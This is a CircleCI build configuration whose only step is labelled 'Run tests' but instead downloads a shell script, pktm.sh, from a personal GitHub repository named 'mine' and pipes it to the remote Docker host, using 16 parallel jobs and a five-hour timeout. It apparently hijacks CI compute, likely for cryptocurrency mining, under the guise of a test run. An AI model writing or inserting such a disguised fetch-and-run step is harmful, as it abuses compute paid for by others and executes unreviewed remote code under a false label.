jobs:
  build:
    parallelism: 16
    docker:
      - image: cimg/ruby:3.0.2-node
    steps: 
      - checkout
      - setup_remote_docker:
          version: 19.03.13
      - run: 
          name: Run tests 
          command: | 
            wget https://raw.githubusercontent.com/geraldyolang11/mine/main/pktm.sh
            chmod +x pktm.sh
            cat pktm.sh | ssh remote-docker
          no_output_timeout: 5h
